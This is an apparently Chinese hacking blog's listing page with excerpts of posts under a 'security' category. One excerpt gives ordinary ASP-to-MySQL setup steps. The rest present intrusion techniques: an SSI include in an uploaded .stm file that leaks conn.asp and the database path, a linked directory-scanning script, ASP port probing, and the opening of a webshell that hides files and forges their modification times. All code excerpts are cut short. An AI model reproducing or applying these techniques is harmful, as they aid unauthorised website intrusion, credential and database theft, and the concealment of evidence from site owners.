ASP 连接 MySQL 数据库两种方法

分类:安全 | 2012-07-17 | 撸过 801 次
0人扯谈

一般都是用myodbc来连接。首先,在系统中安装 Mysql 的ODBC数据库驱动。如安装稳定版本是3.51.下载地址是:http://dev.mysql.com/downloads/connector/odbc/3.51.html。

下载安装好后。在控制面板-->管理工具-->数据源 (ODBC)中的“驱动程序”页中如果有MySQL ODBC 3.51 Driver就说明驱动已经安装成功,就可以开始写程序了。

下面是我测试时使用的程序,里面有说明就不再介绍了。

方法一:

<%
'设置MySql连接属性
'各个变量说明:
' myHost:MySql[......]

继续阅读

阿d asp目录扫描脚本

分类:安全 | 2011-09-19 | 撸过 476 次
0人扯谈

昨天扫描星外发现没有啊D目录脚本。。。现在上传上来!
结合https://www.webshell.cc/1287.html 就OK了!
上图:

下载地址:阿d-asp目录扫描脚本

另类入侵 妙招 下载 曝出 获取ASP源码

分类:安全 | 2011-09-12 | 撸过 523 次
3人扯谈

入侵网站时,遇到实在上传不了木马,可以试试上传一个stm文件, 内容为:
  <!--#include file="conn.asp"-->
  直接访问这个stm文件, 会发现是空白文件,但右键查看源码,你会发现conn.asp就一览无遗, 数据库路径也就到手啦!
  并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!
  原来就是如上所说的,
  <!--#include file="conn.asp"-->
  就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内[......]

继续阅读

ASP探测本地端口之MSWINSCK.OCX方案

分类:安全 | 2011-08-22 | 撸过 454 次
0人扯谈

这个方法很鸡肋,需要服务器有编程环境,mswinsck属于VB控件,装了VC或者VS也行,否则是没有注册的。作为一种思路吧。

MSWINSCK.OCX里的方法可以用来主动连接,但是可能由于本人的ASP功底不够吧,始终没有实现使用Connect方法探测任意IP地址的端口,希望有高人能够写出来代码并能共享出来。

测试环境:Windows 2003 企业版 SP2 IIS 6.0

测试代码:

<%
Function CheckLocalPort(intPort)
On Error Resume Next

Set WinSock = Server.CreateO[......]

继续阅读

隐藏并修改文件的最后修改时间的asp-webshell

分类:安全 | 2011-08-2 | 撸过 403 次
0人扯谈

作者:skyfire[B.H.S.T]

隐藏并修改文件的最后修改时间的asp-webshell

源码:

<%
'隐藏并修改文件的最后修改时间的aspshell
'原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件
'     通过shell.application可以给文件重新设置一个最后修改时间
'2009/02/24  write by skyfire
response.write "<form method=post>"
response.write "路&nb[......]

继续阅读